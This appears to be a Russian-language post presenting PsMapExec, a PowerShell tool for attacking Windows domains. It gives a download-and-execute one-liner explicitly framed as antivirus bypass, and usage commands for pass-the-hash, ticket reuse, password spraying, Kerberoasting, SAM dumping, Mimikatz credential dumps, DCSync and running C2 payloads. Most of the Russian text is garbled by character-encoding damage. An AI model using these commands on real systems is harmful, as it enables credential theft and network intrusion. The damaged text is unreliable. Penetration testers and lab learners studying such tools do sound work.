Начиная с вСрсии 0.6.0, PsMapExec большС Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ‚ ΠΊΠ°ΠΊΠΈΡ…-Π»ΠΈΠ±ΠΎ Π²Π½Π΅ΡˆΠ½ΠΈΡ… зависимостСй, ΠΊΡ€ΠΎΠΌΠ΅ модуля Amnesiac.

PsMapExec Ρ‚Π΅ΠΏΠ΅Ρ€ΡŒ ΠΌΠΎΠΆΠ½ΠΎ Π·Π°ΠΏΡƒΡΠΊΠ°Ρ‚ΡŒ Π² ΠΎΠ³Ρ€Π°Π½ΠΈΡ‡Π΅Π½Π½Ρ‹Ρ… срСдах, Ρ‚Π°ΠΊΠΈΡ… ΠΊΠ°ΠΊ экзамСнационныС Π»Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ ΠΈΠ»ΠΈ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ CTF

ВСкущая ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΊΠ° ΠΌΠ΅Ρ‚ΠΎΠ΄ΠΎΠ² (ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»ΠΎΠ²):
  • RDP
  • SessionHunter
  • SMB
  • SMB Signing
  • Spraying
  • VNC
  • WinRM
  • WMI
  • MSSQL
  • Kerberoast

Π Π΅Π°Π»ΠΈΠ·ΠΎΠ²Π°Π½Π½Ρ‹Π΅ ΠΌΠΎΠ΄ΡƒΠ»ΠΈ:

  • Amnesiac - Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ Amnesiac C2 ΠΏΠ΅ΠΉΠ»ΠΎΠ°Π΄ΠΎΠ²
  • ConsoleHistory - история Π² PowerShell
  • Files - Ρ„Π°ΠΉΠ»Ρ‹ Π² Ρ‚ΠΈΠΏΠΈΡ‡Π½Ρ‹Ρ… дирСкториях
  • KerbDump - Π΄Π°ΠΌΠΏ Kerberos Π±ΠΈΠ»Π΅Ρ‚ΠΎΠ²
  • eKeys - Π΄Π°ΠΌΠΏ ΠΊΠ»ΡŽΡ‡Π΅ΠΉ (Mimikatz)
  • LogonPasswords - Π΄Π°ΠΌΠΏ logon passwords (Mimikatz)
  • LSA - Π΄Π°ΠΌΠΏ LSA (Mimikatz)
  • NTDS - рСализация DCsync
  • SAM - Π΄Π°ΠΌΠΏ SAM

Π—Π°Π³Ρ€ΡƒΠ·ΠΊΠ° скрипта Π² ΠΏΠ°ΠΌΡΡ‚ΡŒ (AV bypass):

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

ΠŸΡ€ΠΈΠΌΠ΅Ρ€Ρ‹:

# Π’Π΅ΠΊΡƒΡ‰ΠΈΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ
PsMapExec -Targets All -Method [Method]

# Π‘ ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΌ
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# Π‘ Ρ…Π΅ΡˆΠ΅ΠΌ
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# Π‘ Π±ΠΈΠ»Π΅Ρ‚ΠΎΠΌ
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Π”Π°ΠΌΠΏ SAM Ρ„Π°ΠΉΠ»Π°
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# ИспользованиС ΠΌΠΎΠ΄ΡƒΠ»Π΅ΠΉ
PsMapExec -Targets All -Method [Method] -Module [Module]




*

ΠžΡ‚ΠΏΡ€Π°Π²ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚Π°Ρ€ΠΈΠΉ (0)
НовыС Π‘Ρ‚Π°Ρ€Ρ‹Π΅